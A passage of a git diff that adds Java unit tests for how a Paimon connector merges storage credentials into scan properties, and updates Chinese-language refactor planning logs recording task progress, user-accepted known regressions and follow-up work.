Arrays.asList(fakeStorageWithoutBackend(), fakeBackendStorage(beMap)); + + PaimonScanPlanProvider provider = new PaimonScanPlanProvider( + new HashMap<>(), new RecordingPaimonCatalogOps(), scanContextWithStorage(storage)); + + Map scanProps = provider.getScanNodeProperties( + null, handle, Collections.emptyList(), Optional.empty()); + + // WHY: a StorageProperties with no BE model (Optional.empty()) must be SKIPPED, never crash, while + // a real object-store entry alongside it still ships its AWS_* under location.* (the merge loop). + // MUTATION: .ifPresent -> .get()/.orElseThrow() -> NoSuchElementException on the empty entry -> red; + // dropping the iteration / merge -> location.AWS_ACCESS_KEY absent -> red. + Assertions.assertEquals("ak", scanProps.get("location.AWS_ACCESS_KEY")); + Assertions.assertEquals("ep", scanProps.get("location.AWS_ENDPOINT")); + } + + /** A ConnectorContext whose getStorageProperties() returns the given typed list verbatim (no vended). */ + private static ConnectorContext scanContextWithStorage(List storage) { + return new ConnectorContext() { + @Override + public String getCatalogName() { + return "c"; + } + + @Override + public long getCatalogId() { + return 0; + } + + @Override + public List getStorageProperties() { + return storage; + } + }; + } + + /** A fe-filesystem {@link StorageProperties} with NO backend model — toBackendProperties() defaults to + * Optional.empty() (the real HDFS case: HdfsFileSystemProvider has no typed BE binding, DV-004/R-007). */ + private static StorageProperties fakeStorageWithoutBackend() { + return new StorageProperties() { + @Override + public String providerName() { + return "no-be"; + } + + @Override + public StorageKind kind() { + return StorageKind.HDFS_COMPATIBLE; + } + + @Override + public FileSystemType type() { + return FileSystemType.HDFS; + } + + @Override + public Map rawProperties() { + return Collections.emptyMap(); + } + + @Override + public Map matchedProperties() { + return Collections.emptyMap(); + } + }; + } + // ---- FIX-JDBC-DRIVER-URL (B-8a): BE-bound driver_url resolution + paimon.jdbc.* alias ---- /** A ConnectorContext whose getEnvironment() returns a fixed map (for jdbc_drivers_dir resolution). */ diff --git a/plan-doc/metastore-storage-refactor/HANDOFF.md b/plan-doc/metastore-storage-refactor/HANDOFF.md index 242d237c22c6fb..ff234355da74ff 100644 --- a/plan-doc/metastore-storage-refactor/HANDOFF.md +++ b/plan-doc/metastore-storage-refactor/HANDOFF.md @@ -7,41 +7,45 @@ --- -**更新时间**:2026-06-17(实现 session:P1-T03 完成) +**更新时间**:2026-06-17(实现 session:P1-T04 完成) **更新人**:Claude(Opus 4.8) ## 这次 session 完成了什么 -1. **P1-T03 ✅**(commit `[P1-T03]`,连接器侧首个 task):paimon `PaimonCatalogFactory.applyStorageConfig` 从 fe-property `StorageProperties.buildObjectStorageHadoopConfig(props)` 改为吃**预算好的** `storageHadoopConfig` 入参;保留其后 `paimon.*/fs./dfs./hadoop.` 覆盖块(last-write-wins)。`PaimonConnector` 新增 `buildStorageHadoopConfig()`,遍历 `ctx.getStorageProperties()` 调 `toHadoopProperties().toHadoopConfigurationMap()` 合并,传入 3 个 `buildXxx`(REST 不用)。pom 加 `fe-filesystem-api` 直接依赖(fe-property 依赖**留** P1-T05 删)。 -2. **TDD**:neuter `storageHadoopConfig.forEach(setter)` → 3 个 Applies/Overlays 测试 RED(`expected was `)→ 恢复 → GREEN。 -3. **测试改造**:删 ~23 canonical-translation 测试(S3/OSS/COS/OBS/MinIO 翻译=fe-filesystem 职责)+ adapt 保留测试 + 新增 6 契约测试(storage map 落 conf×3 builder + explicit-fs.s3a-overrides-storage + paimon-prefix-overrides-storage + kerberos-survives-storage-overlay)。 -4. **验证**:paimon 全模块 **292/0/0/1skip**(docker-gated `PaimonLiveConnectivityTest`),`PaimonCatalogFactoryTest` 42/0,**checkstyle 0**、`tools/check-connector-imports.sh` PASS、`git diff --name-only` 白名单干净。 -5. **对抗 review**(`wf_76df09a4-c2f`,8 agent,4 lens + verify):1 BLOCKER+3 MAJOR+2 MINOR;verify 推翻假 BLOCKER(删 buildHmsHiveConf 重载=唯 paimon 调用方全已改)+2 MAJOR(endpoint-pattern/OSS-derivation 经直接核实 fe-filesystem 已覆盖);**confirm 1 MAJOR=R-006**(调优默认 50/3000/1000、100/10000/10000 在 fe-filesystem **无显式 UT 守护**;**功能今日正确**=字段默认真发,仅测试健壮性缺口)→ 记 R-006 + 加 1 个 in-scope kerberos-storage 测试。 -6. **决策/偏差**:**DV-003**(T1 落地=Option C:connector-local 契约 UT + docker P1-T06 兜底,因 fe-filesystem 对象存储 impl 是运行时插件不在任何单测 classpath;并 DV-003-b:fe-property import 已在 T03 删,P1-T05 退化为仅删 pom 边 + grep 闸)。回写:tasks P1-T03、deviations DV-003、risks R-001(修订)/R-006(新)、PROGRESS。 +1. **P1-T04 ✅**(paimon BE 静态凭据切 typed 路):`PaimonScanPlanProvider.getScanNodeProperties()` 的 BE 静态凭据块从 `ctx.getBackendStorageProperties()` 改为遍历 `ctx.getStorageProperties()` 调 `sp.toBackendProperties().ifPresent(b → backendStorageProps.putAll(b.toMap()))` → 发 `location.`(镜像 P1-T03 `.ifPresent` 风格)。**vended 块(`ctx.vendStorageCredentials`)不动、仍叠在静态块之后**→vended overlays static 保序。加 `org.apache.doris.filesystem.properties.StorageProperties` import;pom 无需改(fe-filesystem-api 依赖 P1-T03 已加)。**仅改 `PaimonScanPlanProvider.java` 1 主文件 + 其测试**。 +2. **关键 recon 发现(DV-002 未覆盖)+ 用户定向**:新 typed 路对 **HDFS 物理上产不出 BE 键**(fe-filesystem **无 HDFS typed BE model**:`HdfsFileSystemProvider` 未 override `bind()`→默认抛 `UnsupportedOperationException`→`FileSystemPluginManager.bindAll` catch 跳过→`getStorageProperties()` 对 HDFS catalog 返回空)。legacy `getBackendStorageProperties()`(fe-core `HdfsProperties.getBackendConfigProperties`)发的 HDFS `hadoop/dfs/HA/kerberos` 键经 `PluginDrivenScanNode→FileQueryScanNode.setLocationPropertiesIfNecessary→HdfsResource.generateHdfsParam→THdfsParams` 是 **load-bearing**→全量切会丢→HDFS paimon 原生读回归。又:`getBackendStorageProperties()` 是 **ConnectorContext 方法、不依赖 fe-property**→**P1-T05 并不需要本切换**,切换纯为 D-003 统一。**用户 2026-06-17 定:按原计划全量切 + 接受 HDFS BE 回归 + follow-up 补 fe-filesystem `HdfsFileSystemProperties`**(记 **DV-004 / R-007 / FU-T01**)。 +3. **TDD**:`scanContext` helper 改喂 `getStorageProperties()` 的 fake `StorageProperties`(删 `getBackendStorageProperties` override)→ `getScanNodePropertiesNormalizesStaticCreds` RED(`expected ak was null`)→ 切产线 GREEN。 +4. **对抗 review confirm 修**:新增 1 测试 `...SkipsStoragePropsWithoutBackendMappingAndMergesRest`(混 `Optional.empty()`-无-BE 项[HDFS-like] + 真对象存储项 → 钉 `.ifPresent` 跳过 + 多 entry `putAll` merge;mutation `.ifPresent→.get()`→RED)+ 2 helper(`scanContextWithStorage`/`fakeStorageWithoutBackend`)。 +5. **验证**:`PaimonScanPlanProviderTest` **52/0**、paimon 全模块 **292/0/0/1skip**、**checkstyle 0**、`tools/check-connector-imports.sh` PASS、`git diff --name-only` 白名单干净(2 文件)、零 `org.apache.doris.property/datasource` import。 +6. **对抗 review**(`wf_09745716-d48`,10 agent,3 lens + verify):7 finding confirm 4。**confirm 1 MAJOR=R-008**(fe-filesystem `Oss/Cos/ObsFileSystemProperties.toBackendKv()` 缺 `AWS_CREDENTIALS_PROVIDER_TYPE`,legacy 对无凭据 OSS/COS/OBS 发 `ANONYMOUS`;S3 typed 有;**fix 在 fe-filesystem 超 P1 白名单**→记 R-008 + **FU-T02**;仅影响无 ak/sk 的 OSS/COS/OBS,带 IAM-role 主机会误取 instance 凭据,公开桶仍 anonymous 非硬失败)+ **3 test-gap 已修**(上条测试)。verify **推翻 3 假 finding**:AWS_BUCKET/ROOT_PATH 超集=DV-002 已接受非回归;「测试没钉新 seam」被**实测 mutation 推翻**(回退旧 seam→RED);OverlaysVended 静态缺失由 sibling NormalizesStaticCreds 覆盖。 ## 当前状态 -- 阶段:Research ✅ / Design ✅(**9 决策 D-001..D-009**)/ **Implement 🚧(P1 3/6)**。 -- 任务计数 **5/14**(P0: 2/2 ✅ | P1: 3/6 | P2: 0/5 | P3a: 0/1)。 -- **连接器 storage 配置路已切**:`CREATE CATALOG raw map` →(fe-core)`bindAll` → `ctx.getStorageProperties()`(fe-filesystem typed)→(连接器)`PaimonConnector.buildStorageHadoopConfig()` 合并 `toHadoopConfigurationMap()` → 3 个 `buildXxx` 叠加(+paimon.*/raw 覆盖 last-write-wins)。 -- paimon main 已**零** `org.apache.doris.property` import(grep 归零);`fe-property` pom 依赖仍在(变 0 import 消费者,P1-T05 删边)。 +- 阶段:Research ✅ / Design ✅(**9 决策 D-001..D-009**)/ **Implement 🚧(P1 4/6)**。 +- 任务计数 **6/14**(P0: 2/2 ✅ | P1: 4/6 | P2: 0/5 | P3a: 0/1)| follow-up 占位 P3b/FU-T01/FU-T02。 +- **连接器 storage + BE 凭据路全切 fe-filesystem-api typed**:catalog 配置 `PaimonConnector.buildStorageHadoopConfig()→toHadoopConfigurationMap()`(P1-T03);BE 扫描分片 `PaimonScanPlanProvider`→`getStorageProperties().toBackendProperties().toMap()`→`location.*`(P1-T04,vended overlays static 不动)。 +- paimon main 已**零** `org.apache.doris.property/datasource` import;`fe-property` pom 依赖仍在(变 0 import 消费者,P1-T05 删边)。 +- ⚠️ **已知接受回归(fe-filesystem typed BE model 不全,fix 超 P1 白名单)**:①HDFS-warehouse paimon BE 配置丢(DV-004/R-007/FU-T01);②无凭据 OSS/COS/OBS 缺 `AWS_CREDENTIALS_PROVIDER_TYPE=ANONYMOUS`(R-008/FU-T02)。用户接受、follow-up 修、docker P1-T06 会暴露(**非新 bug**)。 - ⚠️ **e2e/docker 未跑**(本 session 仅 compile + UT + 对抗 review)。 -## 下一步(明确):P1-T04(BE 静态凭据改走 toBackendProperties().toMap()) +## 下一步(明确):P1-T05(断开 paimon → fe-property 依赖边) > **务必先按顶部流程:读文档 + 对照真实代码 review 方案再动手。** 下面是已知方案,但须现场核实。 -**目标**:paimon `PaimonScanPlanProvider` 的 BE 静态凭据从 `context.getBackendStorageProperties()`(`PaimonScanPlanProvider.java:606`)改为「遍历 `ctx.getStorageProperties()` 调 `toBackendProperties().orElseThrow().toMap()`」合并出 AWS_* map。**vended 动态路径不动**(仍 `ctx.vendStorageCredentials`,D-008;用户定 A=全量切静态、vended 不碰)。 +**目标**:删 `fe-connector-paimon/pom.xml` 的 `fe-property` 依赖边 + `grep` 归零闸。**import/call 已在 P1-T03 清(DV-003-b)→ P1-T05 退化为仅删 pom 边**。**`fe-property` 模块本身不删**(D-005,变 0 消费者孤儿)。 **先做 recon(关键未知)**: -- 读 `PaimonScanPlanProvider.java:600-620` 现有 `getBackendStorageProperties()` 消费点(合并进 scan range location props 的循环);确认 `ctx`(`context` 字段)在该方法可达(应可达,与 catalog 路同 ctx)。 -- `StorageProperties.toBackendProperties()` 返回 `Optional`,`.toMap()` 出 `AWS_*`。注意 fe-filesystem BE map 是**超集**(多 `AWS_BUCKET`/`AWS_ROOT_PATH`/`AWS_CREDENTIALS_PROVIDER_TYPE`,DV-002)——T1 钉常见路径全等 + 记超集(同 P1-T03 的 Option C:真等价 docker 兜底)。 -- vended 叠加顺序:legacy vended REPLACE/overlay 静态(见 catalog-spi P5 FIX-1 记忆);确认改后 vended 仍后叠(精确保序)。 +- `grep -n 'fe-property' fe/fe-connector/fe-connector-paimon/pom.xml`:确认依赖块确切位置 + scope(compile?test?有无被别处 transitive 需要)。 +- 删后 `grep -rn 'org.apache.doris.property' fe/fe-connector/fe-connector-paimon/src` **必须 == 0**(main 已零;核 test 是否还有残留 import,若有需先清)。 +- 删后**全模块编译 + 全 UT 必须仍绿**(确认无隐藏 transitive 依赖断裂——paimon 现仅应依赖 `fe-connector-{api,spi}` + `fe-filesystem-api` + `fe-thrift(provided)` + paimon SDK)。 -**编译/测**:`mvn -f /mnt/disk1/yy/git/wt-catalog-spi/fe/pom.xml -pl fe-connector/fe-connector-paimon -am package -Dassembly.skipAssembly=true -Dmaven.build.cache.enabled=false`(看 `BUILD SUCCESS` 行);`-Dtest=PaimonScanPlanProviderTest` 聚焦。checkstyle 0、import-gate PASS。 +**编译/测**:`mvn -f /mnt/disk1/yy/git/wt-catalog-spi/fe/pom.xml -pl fe-connector/fe-connector-paimon -am package -Dassembly.skipAssembly=true -Dmaven.build.cache.enabled=false`(看 `BUILD SUCCESS` 行 + `Tests run` 292/1skip)。checkstyle 0、import-gate PASS、`git diff --name-only` 仅 `fe-connector-paimon/pom.xml`(+ 本跟踪目录)。 -**之后**:P1-T05(删 paimon→fe-property **pom 依赖边** + `grep org.apache.doris.property` 归零闸;import 已在 T03 删,DV-003-b)→ P1-T06(paimon UT + docker `enablePaimonTest=true` 5 flavor,**真 T1 等价闸 + 验 R-006 调优默认**;不跑则标「未跑 e2e」)。 +**之后**:P1-T06(paimon UT + docker `enablePaimonTest=true` 5 flavor,**真 T1 等价闸 Option C**;**验 R-006 调优默认 + R-007 HDFS 回归边界 + R-008 OSS/COS/OBS ANONYMOUS**;不跑则标「未跑 e2e」)。 ## 未决 / 需注意 -- ✅ 已定:范围 P0+P1(到 P1-T06)|机制 A(D-009)|T1=Option C(DV-003)。 -- ❗ **R-006(confirm,需用户定夺)**:fe-filesystem 对调优默认值(S3 50/3000/1000、OSS/COS/OBS 100/10000/10000)**无显式 UT 守护**(删 paimon canonical 测试暴露)。**功能今日正确**(字段默认真发),docker P1-T06 运行期兜底。**修法(超 P1 白名单,禁碰 fe-filesystem)**=在 `S3/Oss/Cos/ObsFileSystemPropertiesTest` 加 test-only 断言 → **建议作 follow-up / 经用户批准的小补丁**,不在 paimon 重复断言(Option C:paimon 无 fe-filesystem impl 于测试 classpath,合成 map 断言同义反复)。**下次 session 可向用户确认是否纳入。** +- ✅ 已定:范围 P0+P1(到 P1-T06)|机制 A(D-009)|T1=Option C(DV-003)|P1-T04 全量切 + 接受 fe-filesystem typed BE model 缺口回归(用户 2026-06-17)。 +- ❗ **R-007(已触发,用户接受)**:HDFS-warehouse paimon BE 配置丢(fe-filesystem 无 HDFS typed BE model)→ HDFS(尤 HA/kerberized)原生读回归。**follow-up FU-T01** 补 fe-filesystem `HdfsFileSystemProperties`(超白名单)。docker P1-T06 HDFS flavor 会暴露——**已知、非新 bug**。 +- ❗ **R-008(已触发,用户接受类)**:fe-filesystem typed OSS/COS/OBS 缺 `AWS_CREDENTIALS_PROVIDER_TYPE`(无凭据 catalog 的 legacy `ANONYMOUS` 丢)→ 带 IAM-role 云主机误取 instance 凭据(公开桶仍 anonymous 非硬失败)。**follow-up FU-T02**(超白名单)。仅影响无 ak/sk 的 OSS/COS/OBS。 +- ❗ **R-006(confirm,需用户定夺)**:fe-filesystem 对调优默认值(S3 50/3000/1000、OSS/COS/OBS 100/10000/10000)**无显式 UT 守护**。**功能今日正确**,docker P1-T06 兜底。修法(超 P1 白名单)=在 `S3/Oss/Cos/ObsFileSystemPropertiesTest` 加 test-only 断言,作 follow-up。 +- 📌 **R-006/R-007/R-008 + FU-T01/FU-T02 同源**:均「fe-filesystem typed storage 模型对 legacy 不完整(BE model 缺 HDFS、缺 OSS/COS/OBS provider-type、缺调优默认断言),fix 全在 fe-filesystem(超 P1 白名单)」→ 宜与 fe-filesystem 收口/迁移批次或经用户批准的小补丁同做。**下次 session 可向用户确认是否纳入。** - ⚠️ e2e 全程未跑;P1-T06 前如不部署 docker,明确标「未跑 e2e」(CLAUDE.md Rule 12)。 ## 红线提醒(WORKFLOW §4) @@ -53,4 +57,4 @@ ## 关键链接 - 设计:[`../designs/metastore-storage-property-refactor-design-2026-06-17.md`](../designs/metastore-storage-property-refactor-design-2026-06-17.md) - 流程:[`WORKFLOW.md`](./WORKFLOW.md) | 任务:[`tasks.md`](./tasks.md) | 决策:[`decisions-log.md`](./decisions-log.md) | 偏差:[`deviations-log.md`](./deviations-log.md) | 风险:[`risks.md`](./risks.md) -- 对抗 review(P1-T03):workflow `wf_76df09a4-c2f`(transcript 在 session subagents 目录) +- 对抗 review(P1-T04):workflow `wf_09745716-d48`(10 agent,confirm R-008 + 3 test-gap;transcript 在 session subagents 目录)|P1-T03:`wf_76df09a4-c2f` diff --git a/plan-doc/metastore-storage-refactor/PROGRESS.md b/plan-doc/metastore-storage-refactor/PROGRESS.md index af29a86780ffb1..5fa2fe57110d1c 100644 --- a/plan-doc/metastore-storage-refactor/PROGRESS.md +++ b/plan-doc/metastore-storage-refactor/PROGRESS.md @@ -10,17 +10,18 @@ |---|---|---| | Research(调研) | ██████████ 100% | ✅ 完成(8-agent + grep;+ 3-agent recon 复核 D-006/7/8) | | Design(设计) | ██████████ 100% | ✅ 完成(设计文档 + **7 决策** D-001..D-008,范围已收窄) | -| **Implement(实现)** | █████░░░░░ ~36% | 🚧 **进行中**(范围 P0+P1 已获批;P0 ✅;P1 3/6,连接器侧已起步:paimon storage 改走 fe-filesystem-api) | +| **Implement(实现)** | ██████░░░░ ~43% | 🚧 **进行中**(范围 P0+P1 已获批;P0 ✅;P1 4/6,连接器侧 storage(P1-T03)+BE 凭据(P1-T04)均切 fe-filesystem-api typed) | -任务计数:**5 / 14** 完成(P0: 2/2 ✅ | P1: 3/6 | P2: 0/5 | **P3a: 0/1**)| + **P3b**(全量去重 follow-up,范围外占位)。 +任务计数:**6 / 14** 完成(P0: 2/2 ✅ | P1: 4/6 | P2: 0/5 | **P3a: 0/1**)| + **P3b / FU-T01 / FU-T02**(follow-up,范围外占位)。 --- ## 当前活跃 task -- **下一个:`P1-T04`**(paimon `PaimonScanPlanProvider` BE 静态凭据从 `ctx.getBackendStorageProperties()` 切到遍历 `getStorageProperties()` 调 `toBackendProperties().toMap()`;vended 动态路径不动)。 -- P0-T01 ✅|P0-T02 ✅(bindAll)|P1-T01 ✅(getStorageProperties 默认方法 + 边)|P1-T02 ✅(getStorageProperties 实现 + FileSystemFactory accessor)|**P1-T03 ✅**(paimon `PaimonCatalogFactory.applyStorageConfig` 改走 `ctx.getStorageProperties().toHadoopConfigurationMap()`;连接器侧首个 task)。 -- ✅ **连接器 storage 配置路已切**:`PaimonConnector.buildStorageHadoopConfig()` 经 `ctx.getStorageProperties()` 取 fe-filesystem typed → `toHadoopConfigurationMap()` → 3 个 `PaimonCatalogFactory.buildXxx` 叠加(保留 paimon.*/raw 覆盖 last-write-wins)。paimon main 已零 `org.apache.doris.property` import(DV-003-b:P1-T05 仅剩删 pom 边)。 -- ▶ **下一步**:P1-T04(BE 凭据切 `toBackendProperties().toMap()`)→ P1-T05(删 paimon→fe-property pom 边)→ P1-T06(docker 5-flavor,真等价闸 Option C;并验 R-006 调优默认)。 +- **下一个:`P1-T05`**(删 `fe-connector-paimon/pom.xml` 的 `fe-property` 依赖边 + `grep org.apache.doris.property` 归零闸;import/call 已在 P1-T03 清,DV-003-b → P1-T05 退化为仅删 pom 边)。 +- P0-T01 ✅|P0-T02 ✅(bindAll)|P1-T01 ✅(getStorageProperties 默认方法 + 边)|P1-T02 ✅(getStorageProperties 实现 + FileSystemFactory accessor)|P1-T03 ✅(paimon storage 配置 `applyStorageConfig` 改走 `toHadoopConfigurationMap()`)|**P1-T04 ✅**(paimon BE 静态凭据改走 `getStorageProperties().toBackendProperties().toMap()`,全量切)。 +- ✅ **连接器 storage + BE 凭据路全切 fe-filesystem-api typed**:catalog 路 `PaimonConnector.buildStorageHadoopConfig()→toHadoopConfigurationMap()`;BE 扫描分片路 `PaimonScanPlanProvider` 遍历 `getStorageProperties()→toBackendProperties().toMap()`→`location.*`(vended overlays static 保序不动)。paimon main 已零 `org.apache.doris.property/datasource` import(DV-003-b:P1-T05 仅剩删 pom 边)。 +- ⚠️ **已知接受回归(fe-filesystem typed BE model 不全,超 P1 白名单)**:HDFS-warehouse paimon BE 配置丢(DV-004/R-007/FU-T01);无凭据 OSS/COS/OBS 缺 `AWS_CREDENTIALS_PROVIDER_TYPE=ANONYMOUS`(R-008/FU-T02)。均用户接受、follow-up 修、docker P1-T06 会暴露(非新 bug)。 +- ▶ **下一步**:P1-T05(删 pom 边)→ P1-T06(docker 5-flavor 真等价闸 Option C;验 R-006 调优默认 + R-007/R-008 已知回归边界)。 ## 阻塞 / 待决 - ✅ 范围已获批(2026-06-17)= **P0+P1(storage 收口),做到 P1-T06 gate 停**。 @@ -30,6 +31,7 @@ --- ## 最近动态(最近 7 天) +- 2026-06-17 **P1-T04 ✅**(paimon `PaimonScanPlanProvider` BE 静态凭据全量切 `getStorageProperties().toBackendProperties().ifPresent(putAll(toMap()))`→`location.*`;vended 不动、叠后保序):现场 recon 揪出 **DV-002 未覆盖的 HDFS 缺口**——fe-filesystem 无 HDFS typed BE model(`HdfsFileSystemProvider.bind` 抛→`bindAll` 跳过),legacy `getBackendStorageProperties()` 经 fe-core 发的 HDFS `hadoop/dfs/HA/kerberos`→`THdfsParams` 是 load-bearing,全量切会丢→HDFS paimon 原生读回归;`getBackendStorageProperties()` 是 ConnectorContext 方法不依赖 fe-property→P1-T05 不需此切换,纯 D-003 统一。**用户定全量切 + 接受 HDFS 回归 + follow-up 补 HDFS typed BE 类**(DV-004/R-007/FU-T01)。TDD RED(`expected ak was null`)→GREEN;52/0 + 全模块 292/0/1skip + checkstyle 0 + import-gate PASS + 白名单干净(2 文件)。**对抗 review `wf_09745716-d48`**(10 agent)confirm 4:MAJOR=R-008(OSS/COS/OBS typed 缺 `AWS_CREDENTIALS_PROVIDER_TYPE` ANONYMOUS,fe-filesystem 超白名单→FU-T02,仅无凭据 catalog)+ 3 test-gap 已修(新增 Optional.empty 跳过 + 多 entry merge 测试);推翻 3 假 finding(含实测 mutation 证「测试钉了新 seam」)。⚠️ docker e2e 未跑。 - 2026-06-17 **P1-T03 ✅**(commit `[P1-T03]`;连接器侧首个 task;paimon `applyStorageConfig` 改走 `ctx.getStorageProperties().toHadoopConfigurationMap()`):recon 证 ctx 在 `PaimonConnector.createCatalog()` 可达 → `buildStorageHadoopConfig()` 合并下发;保留 paimon.*/raw 覆盖 last-write-wins。**T1 = Option C**(用户选;fe-filesystem 对象存储 impl 是运行时插件不在单测 classpath → paimon UT 只钉 connector-local 契约,真等价由 docker P1-T06 兜底;DV-003)。TDD RED(neuter forEach → 3 测红)→GREEN;删 ~23 canonical 测试(fe-filesystem 职责)+ 6 新契约测试;**292/0/0/1skip + checkstyle 0 + import-gate PASS + 白名单干净**。**对抗 review `wf_76df09a4-c2f`** 推翻假 1B+2M、confirm 1M=**R-006**(调优默认 50/3000/1000、100/10000/10000 fe-filesystem 无显式 UT 守护;功能正确,docker 兜底,fe-filesystem 加断言 follow-up 超白名单)。⚠️ docker e2e 未跑。 - 2026-06-17 **P1-T02 ✅**(`DefaultConnectorContext.getStorageProperties()` + `FileSystemFactory.bindAllStorageProperties`,D-009 二次确认 3 文件):TDD 4 绿(factory 委托/fallback + ctx 空/全量绑定捕获 raw map)+ 回归 2 绿;checkstyle 0;raw map 经 `getOrigProps()` 取。**fe-core 侧管线打通**。 - 2026-06-17 **P1-T01 ✅**(`ConnectorContext.getStorageProperties()` 默认空列表 + `fe-connector-spi→fe-filesystem-api` pom 边):TDD(RED assertNotNull→GREEN 1/1)+ checkstyle 0 + import-gate PASS;新建首个 fe-connector-spi 测试。 diff --git a/plan-doc/metastore-storage-refactor/deviations-log.md b/plan-doc/metastore-storage-refactor/deviations-log.md index c6397c09665155..fe88b9fcdacd2d 100644 --- a/plan-doc/metastore-storage-refactor/deviations-log.md +++ b/plan-doc/metastore-storage-refactor/deviations-log.md @@ -6,6 +6,16 @@ --- +## DV-004 — P1-T04 BE 凭据全量切 typed 路会丢 HDFS BE 键(fe-filesystem 无 HDFS typed BE model)→ 用户定「按原计划全切、接受 HDFS 回归、follow-up 补 fe-filesystem HdfsFileSystemProperties」 +- **日期**:2026-06-17 | **原计划位置**:设计 §5 T1 / WORKFLOW §5.2 T1 / **DV-002**(「P1-T03/T04 全量切换 fe-filesystem,含 P1-T04 BE 凭据也切 `toBackendProperties().toMap()`」,隐含与 P1-T03 同源等价);task `P1-T04`。 +- **为何偏差(现场 recon 取证,对照真实代码)**:新 typed 路对 **HDFS 物理上产不出 BE 键**—— + - **fe-filesystem 无 HDFS typed BE model**:`HdfsFileSystemProvider implements FileSystemProvider`(基接口泛型,**无**具体 `HdfsFileSystemProperties` 类),**未** override `bind()` → 用 `FileSystemProvider.bind()` 默认实现 `throw UnsupportedOperationException("...does not support typed FileSystemProperties binding yet")`;`FileSystemPluginManager.bindAll` **catch 该异常并跳过** → `getStorageProperties()` 对 HDFS-warehouse catalog 返回**空** → `toBackendProperties().toMap()` 链无 HDFS 项。 + - **legacy 路有 HDFS**:`getBackendStorageProperties()`(`DefaultConnectorContext:203` → `CredentialUtils.getBackendPropertiesFromStorageMap` → fe-core `HdfsProperties.getBackendConfigProperties:198`)发 HDFS 的 `hadoop.*/dfs.*/HA/kerberos` 键。 + - **这些键 load-bearing**:经 `PluginDrivenScanNode.getLocationProperties`(去 `location.` 前缀) → `FileQueryScanNode.setLocationPropertiesIfNecessary` → `HdfsResource.generateHdfsParam(locationProperties)` → `THdfsParams`(namenode/HA/kerberos)。故全量切丢 HDFS BE 配置 → **HDFS-warehouse paimon 原生读回归**(解析不了 HA nameservice / 无 kerberos)。对象存储侧两路等价(typed 为超集,DV-002)。 +- **关键事实**:`getBackendStorageProperties()` 是 **`ConnectorContext` SPI 方法、不依赖 fe-property**(连接器只 import `connector.spi.ConnectorContext`),故 **P1-T05 断 paimon→fe-property 边并不需要本切换**;切换纯为 D-003「连接器只见 fe-filesystem-api 的统一 typed 消费」架构收益,而该收益对 HDFS 物理做不到(除非动 fe-filesystem,超 P1 白名单)。 +- **新方案(用户 2026-06-17 定)**:**按原计划全切**——对象存储走 typed 路 `getStorageProperties()→toBackendProperties().toMap()`(`.ifPresent` 跳过无 BE 项,镜像 P1-T03 风格),HDFS 暂丢;**接受 HDFS BE 回归**,后续由用户**补 fe-filesystem `HdfsFileSystemProperties` typed BE model** 修复(记 **follow-up FU-T01** + **R-007**)。代码注释标 `KNOWN GAP (DV-004 / R-007)`。**被否**:(a) 保留 `getBackendStorageProperties`(最安全、零回归,但放弃 D-003 统一);(b) 混合两路(对象存储 typed + HDFS legacy,多代码、要管叠加顺序/防重复,无功能收益)。 +- **影响范围**:P1-T04 实现(`PaimonScanPlanProvider` 静态凭据块 + 注释)与测试(`scanContext` 改喂 `getStorageProperties()` 的 fake `StorageProperties` + 新 `fakeBackendStorage` helper);新增 **R-007** + **follow-up FU-T01**(tasks 占位);**P1-T06 docker HDFS flavor 会暴露此回归**(须知晓为**已接受、非新 bug**);不影响对象存储 flavor、不影响 P2/P3a。`getBackendStorageProperties()` SPI default 方法**保留**(连接器停止调用,移除非「新增」、超 P1-T04 范围,留作 follow-up 清理)。 + ## DV-003 — T1 自动等价测试不可在 UT 落地 → 改「connector-local 契约 UT + docker 兜底」;并连带 P1-T03 提前删 fe-property import + 删 ~23 canonical 测试 - **日期**:2026-06-17 | **原计划位置**:设计 §5 T1 / WORKFLOW §5.2 T1(DV-002 框架:「新 `toHadoopConfigurationMap()` 与旧 `buildObjectStorageHadoopConfig` 在常见静态凭据路径 key/value **全等**」作为切换回归闸);task P1-T03、P1-T05。 - **DV-003-a(T1 落地形态,用户 2026-06-17 选 Option C)**: diff --git a/plan-doc/metastore-storage-refactor/risks.md b/plan-doc/metastore-storage-refactor/risks.md index f1c12ced0e4a59..af869ffcf2d737 100644 --- a/plan-doc/metastore-storage-refactor/risks.md +++ b/plan-doc/metastore-storage-refactor/risks.md @@ -17,6 +17,18 @@ - **缓解**:**docker P1-T06** 为运行期兜底;**建议 follow-up**(**超出当前 P1 白名单——fe-filesystem 禁碰**):在 `S3FileSystemPropertiesTest` + `Oss/Cos/ObsFileSystemPropertiesTest` 加调优默认断言(test-only additive)。在 fe-filesystem 收口/迁移批次或经用户批准的小补丁中做。**不在 paimon 重复断言**(Option C:paimon 无 fe-filesystem impl 于测试 classpath,合成 map 断言为同义反复,不守 fe-filesystem 默认)。 - **触发判据**:fe-filesystem 调优默认被改且 docker P1-T06 未跑 → 静默 mis-tune。 +## R-007 — HDFS-warehouse paimon BE 配置回归(typed BE 路无 HDFS model)| 状态:已触发(用户接受,待 follow-up FU-T01 修) +- **描述(P1-T04,DV-004)**:BE 静态凭据全量切到 `getStorageProperties()→toBackendProperties().toMap()`。fe-filesystem **无 HDFS typed BE model**(`HdfsFileSystemProvider` 未 override `bind()`→默认抛 `UnsupportedOperationException`→`bindAll` 跳过)→ HDFS-warehouse paimon catalog 的 `getStorageProperties()` 返回空 → BE 扫描分片**不再带** `hadoop.*/dfs.*/HA/kerberos` 键(legacy 经 `getBackendStorageProperties`→`THdfsParams` 发)。 +- **影响**:HDFS(尤其 **HA / kerberized**)上的 paimon **原生读失败**(解析不了 nameservice / 无鉴权);**对象存储 flavor 不受影响**(typed 路 AWS_* 等价/超集)。 +- **缓解**:**follow-up FU-T01**——给 `fe-filesystem-hdfs` 新建 `HdfsFileSystemProperties`(`implements BackendStorageProperties`,override `FileSystemProvider.bind`)让 `bindAll` 收集 HDFS 项、`toBackendProperties()` 产 BE 键。**过渡期 HDFS-warehouse paimon 为已知回归**(用户 2026-06-17 明确接受)。 +- **触发判据**:docker P1-T06 HDFS-backed flavor 读失败(**已知、非新 bug**;须与真新回归区分)。 + +## R-008 — fe-filesystem typed OSS/COS/OBS BE map 缺 AWS_CREDENTIALS_PROVIDER_TYPE(无凭据 catalog 的 ANONYMOUS 漂移)| 状态:已触发(用户接受类,待 follow-up FU-T02 修) +- **描述(P1-T04 对抗 review `wf_09745716-d48` confirm MAJOR)**:fe-filesystem `Oss/Cos/ObsFileSystemProperties.toBackendKv()` **不发** `AWS_CREDENTIALS_PROVIDER_TYPE`(无该字段);legacy fe-core 